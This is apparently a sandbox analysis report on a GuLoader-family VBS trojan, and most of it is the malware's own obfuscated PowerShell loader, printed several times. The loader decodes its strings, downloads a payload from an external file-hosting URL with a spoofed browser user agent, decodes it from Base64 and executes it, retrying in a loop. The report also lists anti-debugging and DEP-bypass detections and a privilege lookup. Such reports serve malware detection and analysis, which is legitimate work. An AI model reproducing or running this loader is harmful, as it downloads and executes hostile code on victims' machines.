hydrF pe iKi,gr SuceMappfBa foSowtx Hyp/Jogg1 ong3 ere1Pemp..yst0';$Rstet=Trningsdragten 'Rinku rosBastESlagrPoly- TraaPhonGDarweUdstnTra,t';$Counterarguments243=Trningsdragten 'RavihBlodtTraatAvulpFae s Fre:Re,t/Ur.c/WeekfHolbiCasslLet,eal.edSm lnE.ox.die.eJaunuSkr / Kl lBes.9Bestt MasESam wO erb Ic 9Rad s S p6FlgeaSt,raParaRIndkwCra 5BantfNep y ,doU mbiiDaora rotCsnig0StedlU apfF ri/SjalKSm toSternStamt affr evo eadlRe,ep HomuDelalIschtUnpue GalnBesteTs,r.brndpRdbgs remd';$Mureren=Trningsdragten 'mani>';$Decemvir=Trningsdragten 'Skami posEAr ex';$Grundskyldpromille='Dotationers';$Refleksbevgelserne='\Haremmets184.Ink';Indtrre (Trningsdragten 'Folk$MopeG MicLNatuoSecubM.lta EneLOutr:To.ssAmalkAcr oW.ttm HusaNudagUn.cEF.rsr FodSmy,tvHypeE EntnEnigdvernE ibbN,linS,edg=Cocc$FrsteUdstnNitrVFort:RnneASt gPMassPForadSkikaSpuntUnopaChe + at$B lbr NoneTundFUncoLArsee BulKHaanS ktibr.nle Gu.V,enngHalve ernlGeneS BibEAd lrCo sNIvore');Indtrre (Trningsdragten 'Gene$No,ig udbl Sveo TemB ulva Kablfngs:sponsBea kGeneR korITimeV Un.E CenS nexTBisai HuslAfs SConc=Traf$N,maCP inOStyruOmenn PuntGennEBal,rWeddaU aaR Sp gBie uTi eM,ongEMejenZoodtRundsAbso2Stra4Ages3Unpi. ykkSBeloPK ldLPasnIReveTXipe(eva,$ TramTulluEmalRTimbEJourRSherEFrienSnor)');Indtrre (Trningsdragten $Sobrere);$Counterarguments243=$Skrivestils[0];$Teledendrion=(Trningsdragten 'Jewe$KamkgFo sL Ta.oBestBSkraaDe il G.a:CereAModscA,umCForuu C lB NonA Je tSoftiSek O.iscnNdsi= skiN .ayE Ka W,lut-U,loOvalsBtracJKkseETestCPleatMilo em swig,YTam,S EmhtPer.echelmLgdo. Krm$ .maARaggN riktLivseTjleBM.llrConvI S rdOprraRegaL');Indtrre ($Teledendrion);Indtrre (Trningsdragten 'Refl$Cel,A ypocAdrec NumuLycobPrepa Tyrt SysiF etoIs hnD gs.hi sHTilse Re a AspdOvereFolkrSprns Ald[Whip$FerrRHovesFrartInteeMaintdiff]Ant =Veri$ Se,TFlipoAttensurrgatabuC meiSa.rnLuscg');$Skruetrkkeren=Trningsdragten ' jer$EffeAC prc Ni.cmidjuvandb RhiaTakttSwadi EuhoDiscnB st.OpmuDAsfao U twI.dsn Banl SploPolyaVenddpa lFDenti SuplB adeKert(La,e$HeteCuberoAfs.uOleon,ilstDupeeSek r TemaPrivrFin g AbauPhagmKurse As nThintDvrgsDain2V rb4 ren3spar,Noun$MatiFSunniScelnI,oniSouns I.vhungaeroc.d,akt)';$Finished=$skomagersvendens;Indtrre (Trningsdragten 'Cata$Un ogMi,mlFumaOSkruBRonaATranlCrem: TubmB raaRanenM.erUM.anfS naaRumfk SknTEup.uDisaRSinghFrusAMoonn StoD AddlRe he LeoRTeknsTro =Ret,(DeblTStireIndusOctuT ira-Smr PJudiAFlfoTfor.hHa i Leuk$Outsf tori.verNTankIAv,rssiz,hV neePotadA sk)');while (!$Manufakturhandlers) {Indtrre (Trningsdragten 'Vid $SatigaritlG anoT aabforsaFuthl,app:,udiHGynaaTra nAlu d .kas PaykStraeO tlrStykuSibymOversTw.rlDisiyIntes,vereSp etKaffs Top=Ord.$HospHNonpuAsmit W,glDemoeKvalnMotodSciee') ;Indtrre $Skruetrkkeren;Indtrre (Trningsdragten 'A.erSHermtansvaForurDisttElem-nednsOv ll VicEKatee pukpBl,t mae4');Indtrre (Trningsdragten ' Gli$,skeG A tlAposOSkalB A,raMastLUbnd:UndoMmaxia An nFranUOmbrFKonga TimKsumptPteru ChorVagahInteA opvnKrigD LiglK ageUnwrrAn.esBumb=En.e(LevnTinteECeyls.sykt mme-G ldPVi,raImplT micHV ll .uis$ hrfBesgiSpecnUn eiAabnsUnseH Un,EMaandReen)') ;Indtrre (Trningsdragten 'c.ra$ AnggIndeLMe cOtoucbBackaBrdpLTr.e:T reH BacASvalaBogmN Netl ActiSaluGFlu Ehents.lag=Dyf $Ne,vg KviLFranOChicBS.ycAPortlFire:S ritMvreEKvikSHyttTKre aFasc1Broo2.ore2card+ Uds+Conv%At.e$Eksps SurKInderTe,sIBo evFifaePo.ySTrimTOpfyiTokslKursSkalk.InstC ,eto ndiuAtron andt') ;$Counterarguments243=$Skrivestils[$Haanliges]}$nomaden=306426;$overconscientiousness=29815;Indtrre (Trningsdragten ' For$HierGNulllTlinoRediBMembAhalvlSe.i: ObccSlaguresumTyk,MPuppeAflsrCrepB SooUAnonnte ad.rid rag= Sto UddaGNo,meYapptHarm-StemcUnspO.ortNNonpTRi ieAnchn,enut,tad res$Hypof Prai SvanOpkaI N,gSSplaHGrune LobD');Indtrre (Trningsdragten ' idr$SlaggSkrilPulcoPolyb eucaTroml Ska:AfsiR Udtu.ffieEufowFriloSilirHagltMedf1 Uni0Mlle0Samt Vo a=Revo crat[ aaS Lo,yBeo sPrivtC,aneS.ism,icr.Beb C,eneoDeten stivUbe,e Magr,eint Mar]Sttt:E ph: auvFfunkrNul o TndmBundBNontaRelasTynge Bes6Hjer4ReinSClontAsparPolei Seln efrgSoci(Rumm$ hacCH lvu ArimF ngmShove UrurEkstbSupeuCappnov rdS,mp)');Indtrre (Trningsdragten 'd ve$CoungAfseL Sg o.ealB AdgACa cL Bre: emiITrasTamatIAf nNPeruEEvolRTil AH,tcr BagYAnap Bri =To.d Inte[AppeSSp.cYLuggS udsTOligetingmHavf.HyleTTriceImmeX.ingtRes..LokoEUdbenPothCU.who iredPresI skjnMerlgIndp]A bu:Octo: tipAMistSStriCRomii supI Til.ReseGme,iEEmottstarS eblTBakorSpalIWrisn ImpGgibl(Scu,$Kom,R GasuUnheekyleWJachO aakrServTkloa1Qui 0 l v0Rout)');Indtrre (Trningsdragten ' Out$ ntgFly lSoroo ZilBRegiARr,aLSti.:PrersS otT wari ErhL FalLLydriHaslNOutrGSkrdSSlada AmanIdeon UncoMorsNBattcBekre.esoRBlya= Prv$OplyiSoulTBurgIC loNaspaeIcefRA.teAVelaRTropyT.tq.BagvSJu pUOmfoBEntosPepttDem,rFremILincN ArbgUdre(Tilt$RigsNNeutO g.nmUdtraDandDSorteHoasNWun , Ref$FiliOEchiV sseE Sn,R ympcK,eeOHo eN SmaSunc.csvolI DieeIsodnPateTDox,I DhoODialuTr ksCounN,ratE.aseSPygmSSte )');Indtrre $Stillingsannoncer;"
filepath: POWERSHELL
1 1 0
Rising Trojan.Starter/VBS!1.10517 (CLASSIC)
huorong Trojan/VBS.GuLoader.m
Time & API Arguments Status Return Repeated

LookupPrivilegeValueW

 system_name:
privilege_name: SeDebugPrivilege
1 1 0
description (no description) rule DebuggerCheck__GlobalFlags
description (no description) rule DebuggerCheck__QueryInfo
description (no description) rule DebuggerHiding__Thread
description (no description) rule DebuggerHiding__Active
description (no description) rule ThreadControl__Context
description (no description) rule SEH__vectored
description Checks if being debugged rule anti_dbg
description Bypass DEP rule disable_dep
cmdline POWERSHELL "<#Lipread Libanons Rafles Aarbgerne #><#Hundespand Topskuddenes Hildebrandine #>$Tyrolervals='Autopathography';function Trningsdragten($Retninger){If ($host.DebuggerEnabled) {$Aktivstoffets=4} for ($Crackerberry=$Aktivstoffets;;$Crackerberry+=5){if(!$Retninger[$Crackerberry]) { break }$Rekonstruhxr+=$Retninger[$Crackerberry]}$Rekonstruhxr}function Indtrre($Graveolency){ .($Decemvir) ($Graveolency)}$Antebridal=Trningsdragten 'klumNClumeG anTB sr.RefrWRosoeprehb DatcKingLIndliBetvE.abbnBertT';$Tonguing=Trningsdragten 'VensMRo.ko muszDansi SpelMonol Manas ri/';$Preage=Trningsdragten ',ardTImmolSwivsRen 1,ymb2';$Sobrere=' Sak[ M,cn raieStiftFord. Mhlsthu ETndeRHeveVFabriPea.c A eEUdfaP RivoN ntIAmirNTavlTPundmToodA Ab Nsluta enig OblEstj.rV js]Udsp:Reco:beskSSuffEfangCUnmouRe erConjiAlimT AksyUnsyPforfRCykloBa btFricO CamCMicrofdeklBrad=Sla $ pblPOktaR Im.E ForAAnnaGu,trE';$Tonguing+=Trningsdragten 'I te5 s t.Pach0Lamp ec(UdbuWEtati,tranRe.sdFuldoTom wForlsRipi ProgN FavTH rd Fore1B,na0 ild.Rawh0bagt;Over striW ydiV linFlso6Forn4 rla;Cock Di cxBegy6 fsa4Flam;g ap Mi drC.usvC.ra:Dock1Cyst3 al1Or.h.Pile0Fer )Tube DubGSaudeMi tcRewokNatao rt/bosw2C.ik0Se i1 pal0 Per0Aut.1Teat0 At,1Swat hydrF pe iKi,gr SuceMappfBa foSowtx Hyp/Jogg1 ong3 ere1Pemp..yst0';$Rstet=Trningsdragten 'Rinku rosBastESlagrPoly- TraaPhonGDarweUdstnTra,t';$Counterarguments243=Trningsdragten 'RavihBlodtTraatAvulpFae s Fre:Re,t/Ur.c/WeekfHolbiCasslLet,eal.edSm lnE.ox.die.eJaunuSkr / Kl lBes.9Bestt MasESam wO erb Ic 9Rad s S p6FlgeaSt,raParaRIndkwCra 5BantfNep y ,doU mbiiDaora rotCsnig0StedlU apfF ri/SjalKSm toSternStamt affr evo eadlRe,ep HomuDelalIschtUnpue GalnBesteTs,r.brndpRdbgs remd';$Mureren=Trningsdragten 'mani>';$Decemvir=Trningsdragten 'Skami posEAr ex';$Grundskyldpromille='Dotationers';$Refleksbevgelserne='\Haremmets184.Ink';Indtrre (Trningsdragten 'Folk$MopeG MicLNatuoSecubM.lta EneLOutr:To.ssAmalkAcr oW.ttm HusaNudagUn.cEF.rsr FodSmy,tvHypeE EntnEnigdvernE ibbN,linS,edg=Cocc$FrsteUdstnNitrVFort:RnneASt gPMassPForadSkikaSpuntUnopaChe + at$B lbr NoneTundFUncoLArsee BulKHaanS ktibr.nle Gu.V,enngHalve ernlGeneS BibEAd lrCo sNIvore');Indtrre (Trningsdragten 'Gene$No,ig udbl Sveo TemB ulva Kablfngs:sponsBea kGeneR korITimeV Un.E CenS nexTBisai HuslAfs SConc=Traf$N,maCP inOStyruOmenn PuntGennEBal,rWeddaU aaR Sp gBie uTi eM,ongEMejenZoodtRundsAbso2Stra4Ages3Unpi. ykkSBeloPK ldLPasnIReveTXipe(eva,$ TramTulluEmalRTimbEJourRSherEFrienSnor)');Indtrre (Trningsdragten $Sobrere);$Counterarguments243=$Skrivestils[0];$Teledendrion=(Trningsdragten 'Jewe$KamkgFo sL Ta.oBestBSkraaDe il G.a:CereAModscA,umCForuu C lB NonA Je tSoftiSek O.iscnNdsi= skiN .ayE Ka W,lut-U,loOvalsBtracJKkseETestCPleatMilo em swig,YTam,S EmhtPer.echelmLgdo. Krm$ .maARaggN riktLivseTjleBM.llrConvI S rdOprraRegaL');Indtrre ($Teledendrion);Indtrre (Trningsdragten 'Refl$Cel,A ypocAdrec NumuLycobPrepa Tyrt SysiF etoIs hnD gs.hi sHTilse Re a AspdOvereFolkrSprns Ald[Whip$FerrRHovesFrartInteeMaintdiff]Ant =Veri$ Se,TFlipoAttensurrgatabuC meiSa.rnLuscg');$Skruetrkkeren=Trningsdragten ' jer$EffeAC prc Ni.cmidjuvandb RhiaTakttSwadi EuhoDiscnB st.OpmuDAsfao U twI.dsn Banl SploPolyaVenddpa lFDenti SuplB adeKert(La,e$HeteCuberoAfs.uOleon,ilstDupeeSek r TemaPrivrFin g AbauPhagmKurse As nThintDvrgsDain2V rb4 ren3spar,Noun$MatiFSunniScelnI,oniSouns I.vhungaeroc.d,akt)';$Finished=$skomagersvendens;Indtrre (Trningsdragten 'Cata$Un ogMi,mlFumaOSkruBRonaATranlCrem: TubmB raaRanenM.erUM.anfS naaRumfk SknTEup.uDisaRSinghFrusAMoonn StoD AddlRe he LeoRTeknsTro =Ret,(DeblTStireIndusOctuT ira-Smr PJudiAFlfoTfor.hHa i Leuk$Outsf tori.verNTankIAv,rssiz,hV neePotadA sk)');while (!$Manufakturhandlers) {Indtrre (Trningsdragten 'Vid $SatigaritlG anoT aabforsaFuthl,app:,udiHGynaaTra nAlu d .kas PaykStraeO tlrStykuSibymOversTw.rlDisiyIntes,vereSp etKaffs Top=Ord.$HospHNonpuAsmit W,glDemoeKvalnMotodSciee') ;Indtrre $Skruetrkkeren;Indtrre (Trningsdragten 'A.erSHermtansvaForurDisttElem-nednsOv ll VicEKatee pukpBl,t mae4');Indtrre (Trningsdragten ' Gli$,skeG A tlAposOSkalB A,raMastLUbnd:UndoMmaxia An nFranUOmbrFKonga TimKsumptPteru ChorVagahInteA opvnKrigD LiglK ageUnwrrAn.esBumb=En.e(LevnTinteECeyls.sykt mme-G ldPVi,raImplT micHV ll .uis$ hrfBesgiSpecnUn eiAabnsUnseH Un,EMaandReen)') ;Indtrre (Trningsdragten 'c.ra$ AnggIndeLMe cOtoucbBackaBrdpLTr.e:T reH BacASvalaBogmN Netl ActiSaluGFlu Ehents.lag=Dyf $Ne,vg KviLFranOChicBS.ycAPortlFire:S ritMvreEKvikSHyttTKre aFasc1Broo2.ore2card+ Uds+Conv%At.e$Eksps SurKInderTe,sIBo evFifaePo.ySTrimTOpfyiTokslKursSkalk.InstC ,eto ndiuAtron andt') ;$Counterarguments243=$Skrivestils[$Haanliges]}$nomaden=306426;$overconscientiousness=29815;Indtrre (Trningsdragten ' For$HierGNulllTlinoRediBMembAhalvlSe.i: ObccSlaguresumTyk,MPuppeAflsrCrepB SooUAnonnte ad.rid rag= Sto UddaGNo,meYapptHarm-StemcUnspO.ortNNonpTRi ieAnchn,enut,tad res$Hypof Prai SvanOpkaI N,gSSplaHGrune LobD');Indtrre (Trningsdragten ' idr$SlaggSkrilPulcoPolyb eucaTroml Ska:AfsiR Udtu.ffieEufowFriloSilirHagltMedf1 Uni0Mlle0Samt Vo a=Revo crat[ aaS Lo,yBeo sPrivtC,aneS.ism,icr.Beb C,eneoDeten stivUbe,e Magr,eint Mar]Sttt:E ph: auvFfunkrNul o TndmBundBNontaRelasTynge Bes6Hjer4ReinSClontAsparPolei Seln efrgSoci(Rumm$ hacCH lvu ArimF ngmShove UrurEkstbSupeuCappnov rdS,mp)');Indtrre (Trningsdragten 'd ve$CoungAfseL Sg o.ealB AdgACa cL Bre: emiITrasTamatIAf nNPeruEEvolRTil AH,tcr BagYAnap Bri =To.d Inte[AppeSSp.cYLuggS udsTOligetingmHavf.HyleTTriceImmeX.ingtRes..LokoEUdbenPothCU.who iredPresI skjnMerlgIndp]A bu:Octo: tipAMistSStriCRomii supI Til.ReseGme,iEEmottstarS eblTBakorSpalIWrisn ImpGgibl(Scu,$Kom,R GasuUnheekyleWJachO aakrServTkloa1Qui 0 l v0Rout)');Indtrre (Trningsdragten ' Out$ ntgFly lSoroo ZilBRegiARr,aLSti.:PrersS otT wari ErhL FalLLydriHaslNOutrGSkrdSSlada AmanIdeon UncoMorsNBattcBekre.esoRBlya= Prv$OplyiSoulTBurgIC loNaspaeIcefRA.teAVelaRTropyT.tq.BagvSJu pUOmfoBEntosPepttDem,rFremILincN ArbgUdre(Tilt$RigsNNeutO g.nmUdtraDandDSorteHoasNWun , Ref$FiliOEchiV sseE Sn,R ympcK,eeOHo eN SmaSunc.csvolI DieeIsodnPateTDox,I DhoODialuTr ksCounN,ratE.aseSPygmSSte )');Indtrre $Stillingsannoncer;"
cmdline "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Lipread Libanons Rafles Aarbgerne #><#Hundespand Topskuddenes Hildebrandine #>$Tyrolervals='Autopathography';function Trningsdragten($Retninger){If ($host.DebuggerEnabled) {$Aktivstoffets=4} for ($Crackerberry=$Aktivstoffets;;$Crackerberry+=5){if(!$Retninger[$Crackerberry]) { break }$Rekonstruhxr+=$Retninger[$Crackerberry]}$Rekonstruhxr}function Indtrre($Graveolency){ .($Decemvir) ($Graveolency)}$Antebridal=Trningsdragten 'klumNClumeG anTB sr.RefrWRosoeprehb DatcKingLIndliBetvE.abbnBertT';$Tonguing=Trningsdragten 'VensMRo.ko muszDansi SpelMonol Manas ri/';$Preage=Trningsdragten ',ardTImmolSwivsRen 1,ymb2';$Sobrere=' Sak[ M,cn raieStiftFord. Mhlsthu ETndeRHeveVFabriPea.c A eEUdfaP RivoN ntIAmirNTavlTPundmToodA Ab Nsluta enig OblEstj.rV js]Udsp:Reco:beskSSuffEfangCUnmouRe erConjiAlimT AksyUnsyPforfRCykloBa btFricO CamCMicrofdeklBrad=Sla $ pblPOktaR Im.E ForAAnnaGu,trE';$Tonguing+=Trningsdragten 'I te5 s t.Pach0Lamp ec(UdbuWEtati,tranRe.sdFuldoTom wForlsRipi ProgN FavTH rd Fore1B,na0 ild.Rawh0bagt;Over striW ydiV linFlso6Forn4 rla;Cock Di cxBegy6 fsa4Flam;g ap Mi drC.usvC.ra:Dock1Cyst3 al1Or.h.Pile0Fer )Tube DubGSaudeMi tcRewokNatao rt/bosw2C.ik0Se i1 pal0 Per0Aut.1Teat0 At,1Swat hydrF pe iKi,gr SuceMappfBa foSowtx Hyp/Jogg1 ong3 ere1Pemp..yst0';$Rstet=Trningsdragten 'Rinku rosBastESlagrPoly- TraaPhonGDarweUdstnTra,t';$Counterarguments243=Trningsdragten 'RavihBlodtTraatAvulpFae s Fre:Re,t/Ur.c/WeekfHolbiCasslLet,eal.edSm lnE.ox.die.eJaunuSkr / Kl lBes.9Bestt MasESam wO erb Ic 9Rad s S p6FlgeaSt,raParaRIndkwCra 5BantfNep y ,doU mbiiDaora rotCsnig0StedlU apfF ri/SjalKSm toSternStamt affr evo eadlRe,ep HomuDelalIschtUnpue GalnBesteTs,r.brndpRdbgs remd';$Mureren=Trningsdragten 'mani>';$Decemvir=Trningsdragten 'Skami posEAr ex';$Grundskyldpromille='Dotationers';$Refleksbevgelserne='\Haremmets184.Ink';Indtrre (Trningsdragten 'Folk$MopeG MicLNatuoSecubM.lta EneLOutr:To.ssAmalkAcr oW.ttm HusaNudagUn.cEF.rsr FodSmy,tvHypeE EntnEnigdvernE ibbN,linS,edg=Cocc$FrsteUdstnNitrVFort:RnneASt gPMassPForadSkikaSpuntUnopaChe + at$B lbr NoneTundFUncoLArsee BulKHaanS ktibr.nle Gu.V,enngHalve ernlGeneS BibEAd lrCo sNIvore');Indtrre (Trningsdragten 'Gene$No,ig udbl Sveo TemB ulva Kablfngs:sponsBea kGeneR korITimeV Un.E CenS nexTBisai HuslAfs SConc=Traf$N,maCP inOStyruOmenn PuntGennEBal,rWeddaU aaR Sp gBie uTi eM,ongEMejenZoodtRundsAbso2Stra4Ages3Unpi. ykkSBeloPK ldLPasnIReveTXipe(eva,$ TramTulluEmalRTimbEJourRSherEFrienSnor)');Indtrre (Trningsdragten $Sobrere);$Counterarguments243=$Skrivestils[0];$Teledendrion=(Trningsdragten 'Jewe$KamkgFo sL Ta.oBestBSkraaDe il G.a:CereAModscA,umCForuu C lB NonA Je tSoftiSek O.iscnNdsi= skiN .ayE Ka W,lut-U,loOvalsBtracJKkseETestCPleatMilo em swig,YTam,S EmhtPer.echelmLgdo. Krm$ .maARaggN riktLivseTjleBM.llrConvI S rdOprraRegaL');Indtrre ($Teledendrion);Indtrre (Trningsdragten 'Refl$Cel,A ypocAdrec NumuLycobPrepa Tyrt SysiF etoIs hnD gs.hi sHTilse Re a AspdOvereFolkrSprns Ald[Whip$FerrRHovesFrartInteeMaintdiff]Ant =Veri$ Se,TFlipoAttensurrgatabuC meiSa.rnLuscg');$Skruetrkkeren=Trningsdragten ' jer$EffeAC prc Ni.cmidjuvandb RhiaTakttSwadi EuhoDiscnB st.OpmuDAsfao U twI.dsn Banl SploPolyaVenddpa lFDenti SuplB adeKert(La,e$HeteCuberoAfs.uOleon,ilstDupeeSek r TemaPrivrFin g AbauPhagmKurse As nThintDvrgsDain2V rb4 ren3spar,Noun$MatiFSunniScelnI,oniSouns I.vhungaeroc.d,akt)';$Finished=$skomagersvendens;Indtrre (Trningsdragten 'Cata$Un ogMi,mlFumaOSkruBRonaATranlCrem: TubmB raaRanenM.erUM.anfS naaRumfk SknTEup.uDisaRSinghFrusAMoonn StoD AddlRe he LeoRTeknsTro =Ret,(DeblTStireIndusOctuT ira-Smr PJudiAFlfoTfor.hHa i Leuk$Outsf tori.verNTankIAv,rssiz,hV neePotadA sk)');while (!$Manufakturhandlers) {Indtrre (Trningsdragten 'Vid $SatigaritlG anoT aabforsaFuthl,app:,udiHGynaaTra nAlu d .kas PaykStraeO tlrStykuSibymOversTw.rlDisiyIntes,vereSp etKaffs Top=Ord.$HospHNonpuAsmit W,glDemoeKvalnMotodSciee') ;Indtrre $Skruetrkkeren;Indtrre (Trningsdragten 'A.erSHermtansvaForurDisttElem-nednsOv ll VicEKatee pukpBl,t mae4');Indtrre (Trningsdragten ' Gli$,skeG A tlAposOSkalB A,raMastLUbnd:UndoMmaxia An nFranUOmbrFKonga TimKsumptPteru ChorVagahInteA opvnKrigD LiglK ageUnwrrAn.esBumb=En.e(LevnTinteECeyls.sykt mme-G ldPVi,raImplT micHV ll .uis$ hrfBesgiSpecnUn eiAabnsUnseH Un,EMaandReen)') ;Indtrre (Trningsdragten 'c.ra$ AnggIndeLMe cOtoucbBackaBrdpLTr.e:T reH BacASvalaBogmN Netl ActiSaluGFlu Ehents.lag=Dyf $Ne,vg KviLFranOChicBS.ycAPortlFire:S ritMvreEKvikSHyttTKre aFasc1Broo2.ore2card+ Uds+Conv%At.e$Eksps SurKInderTe,sIBo evFifaePo.ySTrimTOpfyiTokslKursSkalk.InstC ,eto ndiuAtron andt') ;$Counterarguments243=$Skrivestils[$Haanliges]}$nomaden=306426;$overconscientiousness=29815;Indtrre (Trningsdragten ' For$HierGNulllTlinoRediBMembAhalvlSe.i: ObccSlaguresumTyk,MPuppeAflsrCrepB SooUAnonnte ad.rid rag= Sto UddaGNo,meYapptHarm-StemcUnspO.ortNNonpTRi ieAnchn,enut,tad res$Hypof Prai SvanOpkaI N,gSSplaHGrune LobD');Indtrre (Trningsdragten ' idr$SlaggSkrilPulcoPolyb eucaTroml Ska:AfsiR Udtu.ffieEufowFriloSilirHagltMedf1 Uni0Mlle0Samt Vo a=Revo crat[ aaS Lo,yBeo sPrivtC,aneS.ism,icr.Beb C,eneoDeten stivUbe,e Magr,eint Mar]Sttt:E ph: auvFfunkrNul o TndmBundBNontaRelasTynge Bes6Hjer4ReinSClontAsparPolei Seln efrgSoci(Rumm$ hacCH lvu ArimF ngmShove UrurEkstbSupeuCappnov rdS,mp)');Indtrre (Trningsdragten 'd ve$CoungAfseL Sg o.ealB AdgACa cL Bre: emiITrasTamatIAf nNPeruEEvolRTil AH,tcr BagYAnap Bri =To.d Inte[AppeSSp.cYLuggS udsTOligetingmHavf.HyleTTriceImmeX.ingtRes..LokoEUdbenPothCU.who iredPresI skjnMerlgIndp]A bu:Octo: tipAMistSStriCRomii supI Til.ReseGme,iEEmottstarS eblTBakorSpalIWrisn ImpGgibl(Scu,$Kom,R GasuUnheekyleWJachO aakrServTkloa1Qui 0 l v0Rout)');Indtrre (Trningsdragten ' Out$ ntgFly lSoroo ZilBRegiARr,aLSti.:PrersS otT wari ErhL FalLLydriHaslNOutrGSkrdSSlada AmanIdeon UncoMorsNBattcBekre.esoRBlya= Prv$OplyiSoulTBurgIC loNaspaeIcefRA.teAVelaRTropyT.tq.BagvSJu pUOmfoBEntosPepttDem,rFremILincN ArbgUdre(Tilt$RigsNNeutO g.nmUdtraDandDSorteHoasNWun , Ref$FiliOEchiV sseE Sn,R ympcK,eeOHo eN SmaSunc.csvolI DieeIsodnPateTDox,I DhoODialuTr ksCounN,ratE.aseSPygmSSte )');Indtrre $Stillingsannoncer;"
registry HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F81F111D0E5AB58D396F7BF525577FD30FDC95AA\Blob
parent_process wscript.exe martian_process POWERSHELL "<#Lipread Libanons Rafles Aarbgerne #><#Hundespand Topskuddenes Hildebrandine #>$Tyrolervals='Autopathography';function Trningsdragten($Retninger){If ($host.DebuggerEnabled) {$Aktivstoffets=4} for ($Crackerberry=$Aktivstoffets;;$Crackerberry+=5){if(!$Retninger[$Crackerberry]) { break }$Rekonstruhxr+=$Retninger[$Crackerberry]}$Rekonstruhxr}function Indtrre($Graveolency){ .($Decemvir) ($Graveolency)}$Antebridal=Trningsdragten 'klumNClumeG anTB sr.RefrWRosoeprehb DatcKingLIndliBetvE.abbnBertT';$Tonguing=Trningsdragten 'VensMRo.ko muszDansi SpelMonol Manas ri/';$Preage=Trningsdragten ',ardTImmolSwivsRen 1,ymb2';$Sobrere=' Sak[ M,cn raieStiftFord. Mhlsthu ETndeRHeveVFabriPea.c A eEUdfaP RivoN ntIAmirNTavlTPundmToodA Ab Nsluta enig OblEstj.rV js]Udsp:Reco:beskSSuffEfangCUnmouRe erConjiAlimT AksyUnsyPforfRCykloBa btFricO CamCMicrofdeklBrad=Sla $ pblPOktaR Im.E ForAAnnaGu,trE';$Tonguing+=Trningsdragten 'I te5 s t.Pach0Lamp ec(UdbuWEtati,tranRe.sdFuldoTom wForlsRipi ProgN FavTH rd Fore1B,na0 ild.Rawh0bagt;Over striW ydiV linFlso6Forn4 rla;Cock Di cxBegy6 fsa4Flam;g ap Mi drC.usvC.ra:Dock1Cyst3 al1Or.h.Pile0Fer )Tube DubGSaudeMi tcRewokNatao rt/bosw2C.ik0Se i1 pal0 Per0Aut.1Teat0 At,1Swat hydrF pe iKi,gr SuceMappfBa foSowtx Hyp/Jogg1 ong3 ere1Pemp..yst0';$Rstet=Trningsdragten 'Rinku rosBastESlagrPoly- TraaPhonGDarweUdstnTra,t';$Counterarguments243=Trningsdragten 'RavihBlodtTraatAvulpFae s Fre:Re,t/Ur.c/WeekfHolbiCasslLet,eal.edSm lnE.ox.die.eJaunuSkr / Kl lBes.9Bestt MasESam wO erb Ic 9Rad s S p6FlgeaSt,raParaRIndkwCra 5BantfNep y ,doU mbiiDaora rotCsnig0StedlU apfF ri/SjalKSm toSternStamt affr evo eadlRe,ep HomuDelalIschtUnpue GalnBesteTs,r.brndpRdbgs remd';$Mureren=Trningsdragten 'mani>';$Decemvir=Trningsdragten 'Skami posEAr ex';$Grundskyldpromille='Dotationers';$Refleksbevgelserne='\Haremmets184.Ink';Indtrre (Trningsdragten 'Folk$MopeG MicLNatuoSecubM.lta EneLOutr:To.ssAmalkAcr oW.ttm HusaNudagUn.cEF.rsr FodSmy,tvHypeE EntnEnigdvernE ibbN,linS,edg=Cocc$FrsteUdstnNitrVFort:RnneASt gPMassPForadSkikaSpuntUnopaChe + at$B lbr NoneTundFUncoLArsee BulKHaanS ktibr.nle Gu.V,enngHalve ernlGeneS BibEAd lrCo sNIvore');Indtrre (Trningsdragten 'Gene$No,ig udbl Sveo TemB ulva Kablfngs:sponsBea kGeneR korITimeV Un.E CenS nexTBisai HuslAfs SConc=Traf$N,maCP inOStyruOmenn PuntGennEBal,rWeddaU aaR Sp gBie uTi eM,ongEMejenZoodtRundsAbso2Stra4Ages3Unpi. ykkSBeloPK ldLPasnIReveTXipe(eva,$ TramTulluEmalRTimbEJourRSherEFrienSnor)');Indtrre (Trningsdragten $Sobrere);$Counterarguments243=$Skrivestils[0];$Teledendrion=(Trningsdragten 'Jewe$KamkgFo sL Ta.oBestBSkraaDe il G.a:CereAModscA,umCForuu C lB NonA Je tSoftiSek O.iscnNdsi= skiN .ayE Ka W,lut-U,loOvalsBtracJKkseETestCPleatMilo em swig,YTam,S EmhtPer.echelmLgdo. Krm$ .maARaggN riktLivseTjleBM.llrConvI S rdOprraRegaL');Indtrre ($Teledendrion);Indtrre (Trningsdragten 'Refl$Cel,A ypocAdrec NumuLycobPrepa Tyrt SysiF etoIs hnD gs.hi sHTilse Re a AspdOvereFolkrSprns Ald[Whip$FerrRHovesFrartInteeMaintdiff]Ant =Veri$ Se,TFlipoAttensurrgatabuC meiSa.rnLuscg');$Skruetrkkeren=Trningsdragten ' jer$EffeAC prc Ni.cmidjuvandb RhiaTakttSwadi EuhoDiscnB st.OpmuDAsfao U twI.dsn Banl SploPolyaVenddpa lFDenti SuplB adeKert(La,e$HeteCuberoAfs.uOleon,ilstDupeeSek r TemaPrivrFin g AbauPhagmKurse As nThintDvrgsDain2V rb4 ren3spar,Noun$MatiFSunniScelnI,oniSouns I.vhungaeroc.d,akt)';$Finished=$skomagersvendens;Indtrre (Trningsdragten 'Cata$Un ogMi,mlFumaOSkruBRonaATranlCrem: TubmB raaRanenM.erUM.anfS naaRumfk SknTEup.uDisaRSinghFrusAMoonn StoD AddlRe he LeoRTeknsTro =Ret,(DeblTStireIndusOctuT ira-Smr PJudiAFlfoTfor.hHa i Leuk$Outsf tori.verNTankIAv,rssiz,hV neePotadA sk)');while (!$Manufakturhandlers) {Indtrre (Trningsdragten 'Vid $SatigaritlG anoT aabforsaFuthl,app:,udiHGynaaTra nAlu d .kas PaykStraeO tlrStykuSibymOversTw.rlDisiyIntes,vereSp etKaffs Top=Ord.$HospHNonpuAsmit W,glDemoeKvalnMotodSciee') ;Indtrre $Skruetrkkeren;Indtrre (Trningsdragten 'A.erSHermtansvaForurDisttElem-nednsOv ll VicEKatee pukpBl,t mae4');Indtrre (Trningsdragten ' Gli$,skeG A tlAposOSkalB A,raMastLUbnd:UndoMmaxia An nFranUOmbrFKonga TimKsumptPteru ChorVagahInteA opvnKrigD LiglK ageUnwrrAn.esBumb=En.e(LevnTinteECeyls.sykt mme-G ldPVi,raImplT micHV ll .uis$ hrfBesgiSpecnUn eiAabnsUnseH 